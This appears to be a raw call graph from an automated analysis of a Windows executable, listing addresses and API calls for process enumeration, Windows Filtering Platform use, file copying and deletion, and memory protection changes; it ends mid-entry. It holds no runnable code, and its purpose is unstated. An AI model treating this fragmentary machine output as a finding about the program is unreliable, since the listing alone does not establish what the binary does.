API calls 9686->9691 9706 7ff70489ebc1 9686->9706 9692 7ff70489f663 6 API calls 9687->9692 9707 7ff70489f030 9687->9707 9689->9687 9691->9706 9694 7ff70489f00e 9692->9694 9696 7ff70489f321 9693->9696 9698 7ff70489f763 6 API calls 9693->9698 9697 7ff70489fa57 6 API calls 9694->9697 9695 7ff70489f763 6 API calls 9695->9682 9699 7ff70489fa57 6 API calls 9696->9699 9696->9706 9697->9707 9698->9693 9699->9706 9701 7ff70489f717 4 API calls 9701->9707 9702 7ff70489f119 9703 7ff70489f1b4 9702->9703 9709 7ff70489f134 9702->9709 9704 7ff70489fa57 6 API calls 9703->9704 9703->9706 9704->9706 9705 7ff70489f763 6 API calls 9705->9707 9706->9665 9706->9669 9707->9696 9707->9701 9707->9702 9707->9705 9707->9706 9755 7ff70489fb9a 9707->9755 9708 7ff70489f763 6 API calls 9708->9709 9709->9706 9709->9708 9711 7ff70489f724 9710->9711 9713 7ff70489f73b 9710->9713 9712 7ff70489f560 4 API calls 9711->9712 9712->9713 9713->9648 9715 7ff70489e320 6 API calls 9714->9715 9716 7ff70489e360 9715->9716 9716->9663 9718 7ff70489e32c 9717->9718 9719 7ff70489f663 6 API calls 9718->9719 9720 7ff70489e340 9719->9720 9720->9657 9720->9669 9720->9706 9721 7ff70489f803 9720->9721 9722 7ff70489f663 6 API calls 9721->9722 9723 7ff70489f814 9722->9723 9723->9657 9725 7ff70489f973 9724->9725 9726 7ff70489f95d 9724->9726 9728 7ff70489edfd 9725->9728 9729 7ff70489f560 4 API calls 9725->9729 9731 7ff70489f9d6 9725->9731 9727 7ff70489f763 6 API calls 9726->9727 9727->9725 9739 7ff70489f829 9728->9739 9730 7ff70489f99e 9729->9730 9733 7ff70489f9b4 9730->9733 9736 7ff70489f803 6 API calls 9730->9736 9731->9728 9732 7ff70489f829 6 API calls 9731->9732 9734 7ff70489f560 4 API calls 9731->9734 9737 7ff70489f717 4 API calls 9731->9737 9738 7ff70489f605 LeaveCriticalSection 9731->9738 9732->9731 9733->9728 9735 7ff70489f605 LeaveCriticalSection 9733->9735 9734->9731 9735->9731 9736->9733 9737->9731 9738->9731 9740 7ff70489f847 9739->9740 9741 7ff70489f663 6 API calls 9740->9741 9742 7ff70489ee0b 9741->9742 9742->9675 9744 7ff70489fa80 9743->9744 9745 7ff70489f663 6 API calls 9744->9745 9747 7ff70489fa90 9745->9747 9746 7ff70489fb42 9746->9674 9747->9746 9747->9747 9748 7ff70489f717 4 API calls 9747->9748 9748->9746 9750 7ff70489f77e 9749->9750 9751 7ff70489ef43 9750->9751 9752 7ff70489f663 6 API calls 9750->9752 9751->9682 9751->9695 9753 7ff70489f7b5 9752->9753 9753->9751 9754 7ff70489f717 4 API calls 9753->9754 9754->9751 9756 7ff70489fbaf 9755->9756 9757 7ff70489fbd0 9756->9757 9758 7ff70489fbb3 9756->9758 9760 7ff70489f663 6 API calls 9757->9760 9759 7ff70489f663 6 API calls 9758->9759 9761 7ff70489fbba 9759->9761 9760->9761 9761->9707 9763 7ff70489b516 9762->9763 9764 7ff70489b523 9763->9764 9770 7ff70489b3e7 9763->9770 9766 7ff70489b56e 9764->9766 9767 7ff70489b3e7 fputc 9764->9767 9768 7ff70489b58a 9766->9768 9769 7ff70489b3e7 fputc 9766->9769 9767->9764 9768->9631 9769->9766 9771 7ff70489b3f8 9770->9771 9772 7ff70489b410 9771->9772 9773 7ff70489b409 fputc 9771->9773 9772->9763 9773->9772 9776 7ff70489b73d 9774->9776 9775 7ff70489b78e 9777 7ff70489b82b 9775->9777 9778 7ff70489b3e7 fputc 9775->9778 9776->9775 9779 7ff70489b3e7 fputc 9776->9779 9780 7ff70489b831 9777->9780 9783 7ff70489b3e7 fputc 9777->9783 9778->9777 9779->9776 9781 7ff70489b83a 9780->9781 9788 7ff70489b867 9780->9788 9782 7ff70489b3e7 fputc 9781->9782 9785 7ff70489b8bc 9782->9785 9783->9777 9784 7ff70489b3e7 fputc 9784->9788 9792 7ff70489b8d0 9785->9792 9804 7ff70489b64c 9785->9804 9787 7ff70489b8e8 9789 7ff70489b910 9787->9789 9793 7ff70489b3e7 fputc 9787->9793 9788->9784 9788->9785 9794 7ff70489b420 9788->9794 9789->9644 9790 7ff70489b3e7 fputc 9790->9792 9792->9787 9792->9790 9793->9787 9818 7ff7048a0047 9794->9818 9796 7ff70489b462 9799 7ff7048a0047 4 API calls 9796->9799 9802 7ff70489b4d1 9796->9802 9803 7ff70489b3e7 fputc 9796->9803 9797 7ff70489b44f 9797->9796 9798 7ff70489b3e7 fputc 9797->9798 9798->9797 9799->9796 9800 7ff70489b4ed 9800->9788 9801 7ff70489b3e7 fputc 9801->9802 9802->9800 9802->9801 9803->9796 9805 7ff70489b666 9804->9805 9806 7ff70489b68f 9804->9806 9810 7ff7048a026c 6 API calls 9805->9810 9807 7ff70489b706 9806->9807 9808 7ff70489b6a7 9806->9808 9809 7ff70489b3e7 fputc 9807->9809 9811 7ff7048a0047 4 API calls 9808->9811 9817 7ff70489b6f2 9809->9817 9810->9806 9812 7ff70489b6d5 9811->9812 9813 7ff70489b6f4 9812->9813 9814 7ff70489b6dc 9812->9814 9815 7ff70489b3e7 fputc 9813->9815 9816 7ff70489b3e7 fputc 9814->9816 9814->9817 9815->9817 9816->9814 9817->9792 9819 7ff7048a0053 9818->9819 9820 7ff7048a0058 ___mb_cur_max_func ___lc_codepage_func 9818->9820 9819->9820 9823 7ff70489ffd0 9820->9823 9824 7ff70489fff4 WideCharToMultiByte 9823->9824 9825 7ff70489ffe4 9823->9825 9824->9825 9826 7ff7048a0034 _errno 9824->9826 9825->9826 9827 7ff70489ffeb 9825->9827 9826->9827 9827->9797 11040 7ff70489c49e 11041 7ff70489c4a7 11040->11041 11046 7ff70489b593 11041->11046 11047 7ff70489b5a3 11046->11047 11048 7ff70489b5c1 strlen 11047->11048 11049 7ff70489b5ba 11047->11049 11048->11049 10392 7ff70489a6d0 10393 7ff70489a6f7 10392->10393 10394 7ff70489a763 fprintf 10393->10394 9835 7ff70489c5cf 9836 7ff70489c5e5 9835->9836 9841 7ff70489b919 9836->9841 9838 7ff70489ca67 9839 7ff70489b3e7 fputc 9840 7ff70489c382 9839->9840 9840->9838 9840->9839 9842 7ff70489b92a 9841->9842 9843 7ff70489b2d0 6 API calls 9842->9843 9844 7ff70489b957 9843->9844 9845 7ff70489b979 9844->9845 9846 7ff70489b96c 9844->9846 9848 7ff70489b721 11 API calls 9845->9848 9847 7ff70489b5da fputc 9846->9847 9851 7ff70489b977 9847->9851 9849 7ff70489b984 9848->9849 9850 7ff70489b3e7 fputc 9849->9850 9849->9851 9850->9849 9851->9840 10725 7ff704896fd5 10726 7ff704896feb GetSystemTimeAsFileTime 10725->10726 10727 7ff704896fe0 10725->10727 10726->10727 10728 7ff7048937c0 10729 7ff704891cf4 8 API calls 10728->10729 10730 7ff7048937d0 10729->10730 10731 7ff704891c73 8 API calls 10730->10731 10737 7ff704893816 10730->10737 10732 7ff7048937e4 10731->10732 10733 7ff704893820 GetLastError 10732->10733 10734 7ff7048937fc 10732->10734 10732->10737 10736 7ff7048914e2 6 API calls 10733->10736 10735 7ff7048914e2 6 API calls 10734->10735 10735->10737 10736->10737 9869 7ff704895dc4 9870 7ff704895de5 9869->9870 9871 7ff704895deb CloseHandle 9870->9871 9872 7ff704895df4 9870->9872 9871->9872 11068 7ff70489c4b9 11071 7ff70489c4c7 11068->11071 11069 7ff70489c50e 11073 7ff70489b9b0 fputc 11069->11073 11070 7ff70489c4fe 11072 7ff70489bbb4 fputc 11070->11072 11071->11069 11071->11070 11076 7ff70489c382 11072->11076 11073->11076 11074 7ff70489ca67 11075 7ff70489b3e7 fputc 11075->11076 11076->11074 11076->11075 10747 7ff704891bbb 10748 7ff704891bf4 10747->10748 10749 7ff704891bcc 10747->10749 10750 7ff7048914e2 6 API calls 10748->10750 10751 7ff704891bd1 10749->10751 10752 7ff7048914e2 6 API calls 10749->10752 10750->10751 10752->10751 10762 7ff70489c3f0 10763 7ff70489c423 10762->10763 10764 7ff70489c417 10762->10764 10765 7ff70489b4fe fputc 10763->10765 10766 7ff70489b420 5 API calls 10764->10766 10769 7ff70489c382 10765->10769 10766->10769 10767 7ff70489ca67 10768 7ff70489b3e7 fputc 10768->10769 10769->10767 10769->10768 9873 7ff7048a05f1 QueryFullProcessImageNameW 9874 7ff7048989e7 9875 7ff704898a13 CloseHandle 9874->9875 9885 7ff70489860e 9875->9885 9876 7ff704898669 Process32Next 9878 7ff70489867d GetLastError 9876->9878 9876->9885 9877 7ff704898ca5 CloseHandle 9879 7ff704898cb5 9877->9879 9878->9885 9880 7ff7048914e2 6 API calls 9880->9885 9881 7ff70489a1f1 11 API calls 9881->9885 9882 7ff7048988cd OpenProcess 9883 7ff704898a78 GetLastError 9882->9883 9884 7ff7048988ee QueryFullProcessImageNameW 9882->9884 9887 7ff7048914e2 6 API calls 9883->9887 9884->9885 9886 7ff70489892e GetLastError 9884->9886 9885->9874 9885->9875 9885->9876 9885->9877 9885->9880 9885->9881 9885->9882 9889 7ff704898153 29 API calls 9885->9889 9888 7ff7048914e2 6 API calls 9886->9888 9887->9885 9888->9885 9889->9885 10770 7ff70489c7ec 10772 7ff70489c382 10770->10772 10771 7ff70489ca67 10772->10771 10773 7ff70489b3e7 fputc 10772->10773 10773->10772 10415 7ff7048a06e1 FreeLibrary 10774 7ff70489afe1 strlen 10775 7ff70489aff9 10774->10775 10776 7ff70489b043 10774->10776 10775->10776 10777 7ff70489b026 strncmp 10775->10777 10777->10775 10777->10776 10778 7ff70489a3e1 10779 7ff70489a3f9 10778->10779 10780 7ff70489a43e 10778->10780 10782 7ff70489a46e 10779->10782 10783 7ff70489a3fe 10779->10783 10781 7ff7048914e2 6 API calls 10780->10781 10790 7ff70489a41b 10781->10790 10784 7ff7048914e2 6 API calls 10782->10784 10785 7ff704899ed0 8 API calls 10783->10785 10784->10790 10786 7ff70489a411 10785->10786 10787 7ff70489a4a1 strlen GetProcessHeap HeapAlloc 10786->10787 10786->10790 10788 7ff70489a4d3 10787->10788 10789 7ff70489a52d 10787->10789 10788->10790 10791 7ff70489a4db strlen 10788->10791 10792 7ff7048914e2 6 API calls 10789->10792 10796 7ff704896e61 10791->10796 10792->10788 10795 7ff70489a511 GetProcessHeap HeapFree 10795->10790 10797 7ff704896e71 10796->10797 10798 7ff704896e93 10796->10798 10799 7ff704896ec6 10797->10799 10800 7ff704896e76 10797->10800 10801 7ff7048914e2 6 API calls 10798->10801 10804 7ff7048914e2 6 API calls 10799->10804 10802 7ff704896ef9 10800->10802 10803 7ff704896e7c 10800->10803 10807 7ff704896e85 10801->10807 10805 7ff7048914e2 6 API calls 10802->10805 10806 7ff7048914e2 6 API calls 10803->10806 10803->10807 10804->10807 10805->10807 10806->10807 10807->10790 10807->10795 9906 7ff7048965e3 9907 7ff704896684 9906->9907 9908 7ff7048965f9 9906->9908 9909 7ff7048914e2 6 API calls 9907->9909 9910 7ff704896602 9908->9910 9911 7ff7048966b4 9908->9911 9918 7ff7048966ad 9909->9918 9913 7ff7048966e4 9910->9913 9914 7ff70489660e strlen 9910->9914 9912 7ff7048914e2 6 API calls 9911->9912 9912->9918 9915 7ff7048914e2 6 API calls 9913->9915 9916 7ff704896620 9914->9916 9914->9918 9915->9918 9917 7ff704896640 strlen 9916->9917 9919 7ff70489662f strlen 9916->9919 9925 7ff70489743a 9917->9925 9923 7ff7048914e2 6 API calls 9918->9923 9919->9917 9921 7ff704896656 strlen 9922 7ff7048914e2 6 API calls 9921->9922 9924 7ff70489667a 9922->9924 9923->9924 9926 7ff704897456 9925->9926 9926->9921 9927 7ff70489add8 9928 7ff70489adf3 9927->9928 9929 7ff70489ae3e 9927->9929 9928->9929 9930 7ff70489ae0d EnterCriticalSection LeaveCriticalSection 9928->9930 9930->9929 10423 7ff7048a02d7 10424 7ff7048a02f6 10423->10424 10425 7ff7048a02fd ___lc_codepage_func ___mb_cur_max_func 10423->10425 10424->10425 10426 7ff7048a0318 10425->10426 10427 7ff7048a0358 10425->10427 10426->10427 10428 7ff7048a0323 10426->10428 10431 7ff7048a0361 10426->10431 10428->10427 10429 7ff7048a0150 4 API calls 10428->10429 10429->10428 10430 7ff7048a0150 4 API calls 10430->10431 10431->10427 10431->10430 9931 7ff7048a05d9 SetUnhandledExceptionFilter 9932 7ff7048989d9 9933 7ff704898a13 CloseHandle 9932->9933 9942 7ff70489860e 9933->9942 9934 7ff704898669 Process32Next 9936 7ff70489867d GetLastError 9934->9936 9934->9942 9935 7ff704898ca5 CloseHandle 9937 7ff704898cb5 9935->9937 9936->9942 9938 7ff70489a1f1 11 API calls 9938->9942 9939 7ff7048988cd OpenProcess 9940 7ff704898a78 GetLastError 9939->9940 9941 7ff7048988ee QueryFullProcessImageNameW 9939->9941 9944 7ff7048914e2 6 API calls 9940->9944 9941->9942 9943 7ff70489892e GetLastError 9941->9943 9942->9933 9942->9934 9942->9935 9942->9938 9942->9939 9946 7ff704898153 29 API calls 9942->9946 9947 7ff7048914e2 6 API calls 9942->9947 9945 7ff7048914e2 6 API calls 9943->9945 9944->9942 9945->9942 9946->9942 9947->9942 10818 7ff70489c3dc 10819 7ff70489b3e7 fputc 10818->10819 10821 7ff70489c382 10819->10821 10820 7ff70489ca67 10821->10820 10822 7ff70489b3e7 fputc 10821->10822 10822->10821 11120 7ff70489dcdd strerror 11128 7ff70489cfc8 11120->11128 11129 7ff70489cfd8 11128->11129 11130 7ff70489cff6 strlen 11129->11130 11131 7ff70489cfef 11129->11131 11130->11131 10823 7ff70489dc0b 10824 7ff70489ccd9 2 API calls 10823->10824 10828 7ff70489db86 10824->10828 10825 7ff70489e2e0 10826 7ff70489e301 10825->10826 10827 7ff70489ccd9 2 API calls 10825->10827 10827->10826 10828->10825 10829 7ff70489ccd9 fputwc fwprintf 10828->10829 10830 7ff70489d1bd fputwc 10828->10830 10829->10828 10830->10828 11139 7ff70489ad0e 11140 7ff70489ad13 signal 11139->11140 11141 7ff70489ad25 signal 11140->11141 11142 7ff70489aca1 11140->11142 11141->11142 9955 7ff70489c600 9956 7ff70489c616 9955->9956 9961 7ff70489c1ae 9956->9961 9958 7ff70489ca67 9959 7ff70489c382 9959->9958 9960 7ff70489b3e7 fputc 9959->9960 9960->9959 9962 7ff70489c1c0 9961->9962 9963 7ff70489b2d0 6 API calls 9962->9963 9964 7ff70489c1f8 9963->9964 9965 7ff70489c21f 9964->9965 9966 7ff70489c20d 9964->9966 9968 7ff70489c290 9965->9968 9971 7ff70489c235 9965->9971 9967 7ff70489b5da fputc 9966->9967 9975 7ff70489c21a 9967->9975 9969 7ff70489c294 9968->9969 9970 7ff70489c29b strlen 9968->9970 9974 7ff70489c08a 11 API calls 9969->9974 9970->9969 9972 7ff70489c241 strlen 9971->9972 9973 7ff70489c239 9971->9973 9972->9973 9976 7ff70489b721 11 API calls 9973->9976 9974->9975 9975->9959 9977 7ff70489c274 9976->9977 9977->9975 9978 7ff70489b3e7 fputc 9977->9978 9978->9977 10831 7ff704891001 10833 7ff70489103c __set_app_type 10831->10833 10834 7ff7048910a9 10833->10834 10466 7ff7048a0701 FindClose 11143 7ff70489dcf8 11144 7ff70489dd06 11143->11144 11145 7ff70489dd4f 11144->11145 11146 7ff70489dd3f 11144->11146 11147 7ff70489d1bd fputwc 11145->11147 11148 7ff70489d3c1 fputwc 11146->11148 11149 7ff70489db86 11147->11149 11148->11149 11150 7ff70489e2e0 11149->11150 11153 7ff70489ccd9 fputwc fwprintf 11149->11153 11154 7ff70489d1bd fputwc 11149->11154 11151 7ff70489e301 11150->11151 11152 7ff70489ccd9 2 API calls 11150->11152 11152->11151 11153->11149 11154->11149 9986 7ff70489ddf7 9987 7ff70489de0d 9986->9987 9995 7ff70489d93d 9987->9995 9989 7ff70489e2e0 9990 7ff70489e301 9989->9990 9991 7ff70489ccd9 2 API calls 9989->9991 9991->9990 9992 7ff70489db86 9992->9989 9993 7ff70489ccd9 fputwc fwprintf 9992->9993 9994 7ff70489d1bd fputwc 9992->9994 9993->9992 9994->9992 9996 7ff70489d94e 9995->9996 10004 7ff70489d00f 9996->10004 9999 7ff70489d9a0 10012 7ff70489d897 9999->10012 10000 7ff70489d993 10008 7ff70489cc00 10000->10008 10003 7ff70489d99e 10003->9992 10005 7ff70489d02d 10004->10005 10006 7ff70489e4e0 6 API calls 10005->10006 10007 7ff70489d120 10006->10007 10007->9999 10007->10000 10009 7ff70489cc16 10008->10009 10018 7ff70489cacd 10009->10018 10013 7ff70489d8b9 10012->10013 10033 7ff70489cdd0 10013->10033 10016 7ff70489ca90 fputwc 10017 7ff70489d925 10016->10017 10019 7ff70489cae7 10018->10019 10020 7ff70489cafc 10019->10020 10026 7ff70489cb4c 10019->10026 10021 7ff70489cb04 fwprintf 10020->10021 10022 7ff70489cb27 fwprintf 10020->10022 10025 7ff70489cb39 10021->10025 10022->10025 10023 7ff70489cb51 10028 7ff70489cb8f strlen 10023->10028 10030 7ff70489cbd9 10023->10030 10032 7ff70489ca90 fputwc 10023->10032 10025->10003 10026->10023 10027 7ff70489ca90 fputwc 10026->10027 10027->10026 10029 7ff7048a026c 6 API calls 10028->10029 10029->10023 10030->10025 10031 7ff70489ca90 fputwc 10030->10031 10031->10030 10032->10023 10034 7ff70489cdec 10033->10034 10035 7ff70489ce3d 10034->10035 10037 7ff70489ca90 fputwc 10034->10037 10036 7ff70489ca90 fputwc 10035->10036 10041 7ff70489ceda 10035->10041 10036->10041 10037->10034 10038 7ff70489cee0 10039 7ff70489cf16 10038->10039 10040 7ff70489cee9 10038->10040 10044 7ff70489ca90 fputwc 10039->10044 10045 7ff70489cf6b 10039->10045 10050 7ff70489ccd9 2 API calls 10039->10050 10042 7ff70489ca90 fputwc 10040->10042 10041->10038 10043 7ff70489ca90 fputwc 10041->10043 10042->10045 10043->10041 10044->10039 10051 7ff70489cf7f 10045->10051 10053 7ff70489cc72 10045->10053 10047 7ff70489cf97 10048 7ff70489cfbf 10047->10048 10052 7ff70489ca90 fputwc 10047->10052 10048->10016 10049 7ff70489ca90 fputwc 10049->10051 10050->10039 10051->10047 10051->10049 10052->10047 10054 7ff70489cc80 localeconv 10053->10054 10055 7ff70489ccae 10053->10055 10056 7ff7048a026c 6 API calls 10054->10056 10056->10055 11155 7ff7048958fa 11160 7ff704895189 11155->11160 11158 7ff70489590f 11161 7ff704895219 CopyFileA 11160->11161 11164 7ff7048951b1 11160->11164 11162 7ff704895242 GetLastError 11161->11162 11161->11164 11163 7ff7048914e2 6 API calls 11162->11163 11170 7ff70489526c 11163->11170 11167 7ff7048951e8 11164->11167 11164->11170 11165 7ff7048914e2 6 API calls 11166 7ff7048953ba 11165->11166 11166->11166 11168 7ff7048914e2 6 API calls 11167->11168 11169 7ff704895209 11168->11169 11169->11158 11171 7ff704894bbd 11169->11171 11170->11165 11172 7ff704894bd4 DeleteFileA 11171->11172 11175 7ff704894bde 11171->11175 11173 7ff704894c2b GetLastError 11172->11173 11172->11175 11174 7ff7048914e2 6 API calls 11173->11174 11174->11175 11176 7ff704894d5a 11175->11176 11177 7ff704894c0a 11175->11177 11178 7ff7048914e2 6 API calls 11176->11178 11179 7ff7048914e2 6 API calls 11177->11179 11180 7ff704894d7c 11178->11180 11181 7ff704894c20 11179->11181 11180->11180 11181->11158 8930 7ff7048912fd 8933 7ff704891131 8930->8933 8934 7ff70489115a 8933->8934 8935 7ff704891172 8934->8935 8936 7ff704891169 Sleep 8934->8936 8937 7ff704891194 8935->8937 8938 7ff704891188 _amsg_exit 8935->8938 8936->8934 8939 7ff7048911b5 8937->8939 8940 7ff70489119a _initterm 8937->8940 8938->8939 8941 7ff7048911c5 _initterm 8939->8941 8942 7ff7048911de 8939->8942 8940->8939 8941->8942 8954 7ff70489a96b 8942->8954 8945 7ff70489122e 8946 7ff704891233 malloc 8945->8946 8947 7ff704891253 8946->8947 8948 7ff704891258 strlen malloc 8947->8948 8949 7ff704891283 8947->8949 8948->8947 8965 7ff7048914b8 8949->8965 8951 7ff7048912c4 8952 7ff7048912e3 _cexit 8951->8952 8953 7ff7048912e8 8951->8953 8952->8953 8955 7ff704891208 SetUnhandledExceptionFilter 8954->8955 8957 7ff70489a989 8954->8957 8955->8945 8956 7ff70489ab8f 8956->8955 8959 7ff70489abb7 VirtualProtect 8956->8959 8957->8956 8958 7ff70489aa00 8957->8958 8963 7ff70489aa3f 8957->8963 8958->8956 8960 7ff70489aa1e 8958->8960 8959->8956 8960->8958 8969 7ff70489a824 8960->8969 8962 7ff70489aaaa 8964 7ff70489a824 3 API calls 8962->8964 8963->8956 8963->8962 8964->8963 8966 7ff7048914c8 8965->8966 8976 7ff704891486 8966->8976 8971 7ff70489a84a 8969->8971 8970 7ff70489a953 8970->8960 8971->8970 8972 7ff70489a8af VirtualQuery 8971->8972 8973 7ff70489a8d8 8972->8973 8973->8970 8974 7ff70489a907 VirtualProtect 8973->8974 8974->8970 8975 7ff70489a93f GetLastError 8974->8975 8975->8970 8983 7ff704891360 8976->8983 8982 7ff704891496 9002 7ff704891432 8982->9002 9033 7ff7048919c0 GetModuleHandleExA 8983->9033 8988 7ff704891393 9048 7ff70489168c InitializeCriticalSectionAndSpinCount 8988->9048 8992 7ff7048913a1 8992->8982 9010 7ff704899621 8992->9010 8993 7ff7048919c0 8 API calls 8994 7ff7048913cb 8993->8994 8995 7ff704896c99 12 API calls 8994->8995 8996 7ff7048913e7 8995->8996 9095 7ff704896497 8996->9095 8999 7ff7048913f6 8999->8992 9101 7ff7048997f2 8999->9101 9254 7ff70489193c 9002->9254 9005 7ff704891452 9008 7ff704891475 9005->9008 9009 7ff70489145e GetProcessHeap HeapFree 9005->9009 9006 7ff704891446 9261 7ff704896263 9006->9261 9008->8951 9009->9008 9011 7ff704899650 9010->9011 9012 7ff7048996b0 9011->9012 9013 7ff704899656 9011->9013 9015 7ff7048914e2 6 API calls 9012->9015 9275 7ff7048976d0 9013->9275 9017 7ff7048996c6 9015->9017 9017->8982 9018 7ff70489966e 9019 7ff704899672 9018->9019 9021 7ff704899d2d 7 API calls 9018->9021 9022 7ff7048996fc FwpmEngineClose0 9019->9022 9289 7ff704899d2d 9019->9289 9020 7ff7048976d0 8 API calls 9020->9018 9023 7ff7048996ef 9021->9023 9022->9017 9023->9022 9025 7ff704899722 9023->9025 9299 7ff70489855d 9023->9299 9025->9022 9028 7ff704899d2d 7 API calls 9025->9028 9027 7ff7048996ac 9027->9022 9030 7ff704899737 9028->9030 9030->9019 9030->9022 9325 7ff704898cfc 9030->9325 9034 7ff7048919f2 GetLastError 9033->9034 9035 7ff704891376 9033->9035 9149 7ff7048914e2 9034->9149 9037 7ff704896c99 9035->9037 9038 7ff704896cdf 9037->9038 9039 7ff704896caf 9037->9039 9040 7ff7048914e2 6 API calls 9038->9040 9170 7ff704896b9b 9039->9170 9046 7ff70489138f 9040->9046 9043 7ff704896d0f strlen 9044 7ff704896d21 9043->9044 9045 7ff704896d37 strcat strlen 9043->9045 9044->9045 9047 7ff704896d26 strlen 9044->9047 9045->9046 9046->8988 9072 7ff704895e6f 9046->9072 9047->9045 9049 7ff7048917e0 GetLastError 9048->9049 9050 7ff7048916ba 9048->9050 9052 7ff7048914e2 6 API calls 9049->9052 9051 7ff7048919c0 8 API calls 9050->9051 9053 7ff7048916d6 9051->9053 9057 7ff7048917b9 9052->9057 9054 7ff704896b9b 8 API calls 9053->9054 9055 7ff7048916ea 9054->9055 9056 7ff7048916f4 strlen 9055->9056 9055->9057 9059 7ff704891723 9056->9059 9060 7ff70489170d 9056->9060 9058 7ff7048914e2 6 API calls 9057->9058 9063 7ff70489139d 9058->9063 9061 7ff704891748 strlen fopen 9059->9061 9062 7ff704891728 strcat strlen 9059->9062 9060->9059 9064 7ff704891712 strlen 9060->9064 9065 7ff704891797 9061->9065 9066 7ff7048918ad 9061->9066 9062->9061 9063->8992 9063->8993 9064->9059 9067 7ff7048914e2 6 API calls 9065->9067 9068 7ff7048914e2 6 API calls 9066->9068 9069 7ff7048917b1 9067->9069 9068->9057 9069->9057 9070 7ff70489191d 9069->9070 9071 7ff7048914e2 6 API calls 9070->9071 9071->9063 9073 7ff704895f72 9072->9073 9074 7ff704895e86 9072->9074 9077 7ff7048914e2 6 API calls 9073->9077 9075 7ff704895e8f CreateFileA 9074->9075 9076 7ff704895fa2 9074->9076 9078 7ff704895fd5 GetLastError 9075->9078 9079 7ff704895eda LockFileEx 9075->9079 9081 7ff7048914e2 6 API calls 9076->9081 9080 7ff704895f27 9077->9080 9082 7ff7048914e2 6 API calls 9078->9082 9083 7ff7048960ba GetLastError 9079->9083 9084 7ff704895f0e 9079->9084 9088 7ff704896239 9080->9088 9089 7ff704895f51 9080->9089 9081->9080 9085 7ff704895ff6 9082->9085 9087 7ff7048914e2 6 API calls 9083->9087 9084->9080 9086 7ff70489622b CloseHandle 9084->9086 9085->9083 9094 7ff704896163 9085->9094 9086->9088 9090 7ff7048960db 9087->9090 9091 7ff7048914e2 6 API calls 9088->9091 9092 7ff7048914e2 6 API calls 9089->9092 9090->9094 9093 7ff704895f67 9091->9093 9092->9093 9093->8988 9094->9086 9096 7ff7048964a0 GetFileAttributesA 9095->9096 9097 7ff7048964b5 9095->9097 9098 7ff7048964e5 GetLastError 9096->9098 9100 7ff7048913ef 9096->9100 9099 7ff7048914e2 6 API calls 9097->9099 9098->9100 9099->9100 9100->8999 9123 7ff70489433b 9100->9123 9102 7ff7048998a5 9101->9102 9103 7ff70489981a 9101->9103 9104 7ff7048914e2 6 API calls 9102->9104 9198 7ff7048945d5 9103->9198 9118 7ff704899833 9104->9118 9106 7ff704899854 9108 7ff704899b92 9106->9108 9112 7ff70489987c 9106->9112 9107 7ff70489983d GetProcessHeap HeapFree 9107->9106 9109 7ff7048914e2 6 API calls 9108->9109 9111 7ff704899bb4 9109->9111 9110 7ff70489995d GetProcessHeap HeapAlloc 9113 7ff7048999d0 9110->9113 9120 7ff70489999a 9110->9120 9122 7ff7048914e2 6 API calls 9111->9122 9114 7ff7048914e2 6 API calls 9112->9114 9116 7ff7048914e2 6 API calls 9113->9116 9117 7ff704899892 9114->9117 9116->9120 9117->8992 9118->9106 9118->9107 9119 7ff704899ab3 strncpy strncpy 9119->9120 9120->9118 9120->9119 9121 7ff704899b28 strncpy 9120->9121 9121->9120 9122->9111 9124 7ff7048943e5 9123->9124 9125 7ff70489435a 9123->9125 9126 7ff7048914e2 6 API calls 9124->9126 9127 7ff704894363 fopen 9125->9127 9128 7ff704894415 9125->9128 9133 7ff704894388 9126->9133 9130 7ff704894374 9127->9130 9131 7ff704894448 _errno 9127->9131 9129 7ff7048914e2 6 API calls 9128->9129 9129->9133 9132 7ff7048944d6 fwrite 9130->9132 9130->9133 9134 7ff7048914e2 6 API calls 9131->9134 9137 7ff7048944f8 _errno 9132->9137 9138 7ff7048944ee 9132->9138 9136 7ff70489459a 9133->9136 9142 7ff7048943bb 9133->9142 9135 7ff704894470 _errno 9134->9135 9140 7ff704894479 9135->9140 9141 7ff7048944bd _errno 9135->9141 9144 7ff7048914e2 6 API calls 9136->9144 9139 7ff7048914e2 6 API calls 9137->9139 9138->9137 9143 7ff704894520 _errno 9139->9143 9140->9141 9141->9132 9145 7ff7048914e2 6 API calls 9142->9145 9147 7ff704894529 9143->9147 9148 7ff70489456d _errno 9143->9148 9146 7ff7048943d8 9144->9146 9145->9146 9146->8999 9147->9148 9148->9136 9150 7ff7048914f0 9149->9150 9160 7ff70489b210 9150->9160 9153 7ff704891577 fwrite fflush 9157 7ff7048915a0 9153->9157 9154 7ff7048915ac EnterCriticalSection 9155 7ff7048915c6 LeaveCriticalSection 9154->9155 9156 7ff7048915e3 9154->9156 9155->9153 9158 7ff70489161d CopyFileA 9156->9158 9157->9035 9159 7ff704891655 9158->9159 9159->9155 9161 7ff70489b235 9160->9161 9162 7ff70489b21e 9160->9162 9164 7ff70489c2d0 fputc 9161->9164 9166 7ff70489c2d0 9162->9166 9165 7ff704891549 9164->9165 9165->9153 9165->9154 9165->9157 9169 7ff70489c307 9166->9169 9167 7ff70489ca67 9167->9165 9168 7ff70489b3e7 fputc 9168->9169 9169->9167 9169->9168 9171 7ff704896be2 9170->9171 9172 7ff704896bac 9170->9172 9175 7ff7048914e2 6 API calls 9171->9175 9173 7ff704896bb1 9172->9173 9174 7ff704896c12 9172->9174 9176 7ff704896c42 9173->9176 9177 7ff704896bba 9173->9177 9179 7ff7048914e2 6 API calls 9174->9179 9178 7ff704896bc7 9175->9178 9180 7ff7048914e2 6 API calls 9176->9180 9183 7ff704896a5c 9177->9183 9178->9043 9178->9046 9179->9178 9180->9178 9184 7ff704896b05 9183->9184 9185 7ff704896a76 9183->9185 9186 7ff7048914e2 6 API calls 9184->9186 9187 7ff704896a7f 9185->9187 9188 7ff704896b35 9185->9188 9196 7ff704896ac1 9186->9196 9189 7ff704896b68 9187->9189 9190 7ff704896a88 GetModuleFileNameA GetLastError 9187->9190 9191 7ff7048914e2 6 API calls 9188->9191 9193 7ff7048914e2 6 API calls 9189->9193 9192 7ff704896aa2 9190->9192 9191->9196 9194 7ff704896afa 9192->9194 9195 7ff7048914e2 6 API calls 9192->9195 9193->9196 9194->9178 9195->9196 9197 7ff7048914e2 6 API calls 9196->9197 9197->9194 9199 7ff7048945f7 9198->9199 9222 7ff704894675 9198->9222 9200 7ff704894600 9199->9200 9201 7ff7048946ba 9199->9201 9204 7ff704894610 fopen 9200->9204 9205 7ff7048946ed 9200->9205 9203 7ff7048914e2 6 API calls 9201->9203 9202 7ff7048914e2 6 API calls 9212 7ff7048946b0 9202->9212 9203->9212 9206 7ff704894720 _errno 9204->9206 9207 7ff70489462b fseek 9204->9207 9208 